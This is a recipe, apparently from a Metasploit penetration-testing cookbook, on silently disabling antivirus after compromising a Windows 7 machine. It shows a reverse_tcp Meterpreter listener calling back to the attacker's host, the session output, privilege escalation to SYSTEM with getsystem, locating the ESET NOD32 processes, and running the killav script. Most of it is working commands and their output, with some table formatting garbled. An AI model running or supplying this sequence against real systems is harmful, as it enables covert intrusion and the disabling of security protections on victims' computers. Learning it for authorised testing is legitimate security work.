In the previous recipe, we focused on various techniques that can be implemented to bypass the client-side antivirus protection and open an active session. Well, the story doesn't end here. What if we want to download files from the target system, or install a keylogger, and so on? Such activities can raise an alarm in the antivirus. So, once we have gained an active session, our next target should be to kill the antivirus protection silently. This recipe is all about deactivating them. Killing antivirus is essential in order to keep our activities undetected on the target machine.
In this recipe, we will be using some of the Meterpreter scripts available to us during an active session. We have an entire chapter dedicated to Meterpreter scripts, so here, I will just give a quick introduction to Meterpreter scripts and some useful Meterpreter commands.
Getting ready
Let us start with a quick introduction to Meterpreter. Meterpreter is an advanced payload that greatly enhances the power of command execution on the target machine. It is a command interpreter which works by in-memory DLL injection and provides us with lots of advantages over traditional command interpreters (generally exists with shell codes), as it is more flexible, stable, and extensible. It can work as if several payloads are working together on the target machine. It communicates over the stager socket and provides a comprehensive client-side Ruby API. We can get a Meterpreter shell by using the payloads available in the windows/
meterpreter directory. In this recipe, we will be using the windows/meterpreter/
reverse_tcp payload. Our target machine is Windows 7, the running ESET NOD32 antivirus.
We will proceed by setting up our listener in msfconsole and waiting for a back connection:
msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description ---- ---- ---
---Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description ---- ---- ---
EXITFUNC process yes Exit technique: seh..
LHOST 192.168.56.101 yes The listen address LPORT 4444 yes The listen port
Exploit target:
--
0 Wildcard Target
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.56.101:4444 [*] Starting the payload handler...
How to do it...
1. So, our listener in now ready. Once the client-side attack executes successfully on the target, we will have a Meterpreter session opened in msfconsole:
[*] Sending stage (752128 bytes) to 192.168.56.1
[*] Meterpreter session 2 opened (192.168.56.101:4444 ->
192.168.56.1:49188) at 2011-11-29 13:26:55 +0530
meterpreter >
2. Now, we are all set to leverage the powers of Meterpreter in our experiment of killing the antivirus. The first command we will execute is getuid, which gives us the username of the system in which we broke in. The user can be either the main administrator or a less privileged user:
meterpreter > getuid
Server username: DARKLORD-PC\DARKLORD
3. It doesn't look like we have the administrator privilege in the system we just penetrated. So, the next step will be to escalate our privilege to administrator so that we can execute commands on the target without interruption. We will use the getsystem command which attempts to elevate our privilege from a local user to the administrator:
meterpreter > getsystem
...got system (via technique 4)..
4. As we can see, getsystem has successfully elevated our privilege on the penetrated system using technique 4, which is the KiTrap0D exploit. We can check our new escalated ID by again using the getuid command:
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
5. So, now we have the main administrator rights. The next step will be to run the ps command, which lists all the running processes on the system. We will have to look at those processes that control the antivirus running on the target machine (the output has been shortened to fit):
PID Name User Path ---
1060 svchost.exe NT AUTHORITY\SYSTEM C:\Windows\System32\.
1096 svchost.exe NT AUTHORITY\SYSTEM C:\Windows\system32\.
1140 stacsv.exe NT AUTHORITY\SYSTEM C:\Windows\System32\.
1152 dsmonitor.exe DARKLORD-PC\DARKLORD C:\Program Files\Uni.
1744 egui.exe DARKLORD-PC\DARKLORD C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe
1832 eset.exe NT AUTHORITY\SYSTEM C:\Program Files\ESET\ESET NOD32 Antivirus\eset.exe
6. From the Name and Path columns, we can easily identify the processes that belong to an antivirus instance. In our case, there are two processes responsible for antivirus protection on the target system; they are egui.exe and eset.exe. Let us see how we can use Metasploit to kill these processes.
How it works...
Meterpreter provides a very useful script named killav.rb, which can be used to kill the antivirus processes running on the target system and, thus, disable them. Let us try this script on our Windows 7 target which is running the ESET NOD32 antivirus:
meterpreter > run killav
[*] Killing Antivirus services on the target....
The run command is used to execute Ruby scripts in Meterpreter. Once the script has executed, we can again check the running processes on the target in order to make sure that all of the antivirus processes have been killed. If none of the antivirus processes are running, then it means that the antivirus has been temporarily disabled on the target machine and we can now move ahead with our penetration testing process.
But, what if the processes are still running? Let's find out the solution in the next recipe.